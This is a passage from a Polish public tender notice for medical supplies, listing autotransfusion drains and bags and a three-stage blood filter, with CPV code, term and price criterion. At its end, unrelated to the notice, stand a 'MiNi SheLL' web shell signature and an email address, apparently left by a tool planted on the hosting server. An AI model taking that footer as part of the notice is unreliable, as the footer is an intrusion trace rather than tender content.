1	Dodatkowo dren łączący o długości powyżej 125 cm pozwalający na stworzenie systemu w pełni zamkniętego i przetoczenie krwi pacjentowi bez rozłączania rezerwuaru/mieszka i worka do autotransfuzji lub też pasujący do zestawu worek do autotransfuzji o pojemności 700-1000 ml z wbudowanym filtrem 40-200 mikronów wraz z workiem na krew do drenażu o pojemności minimum 600 ml	opak.	60
	poz.1 - próbki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część nr 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 11		
Lp.	nazwa	j.m.	ilość
1	Filtr krwi kaskadowy, trójstopniowy: 175, 40, 10 mikronów, połączenie typu Spike z możliwością podłączenia do kaniuli obwodowej	szt.	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com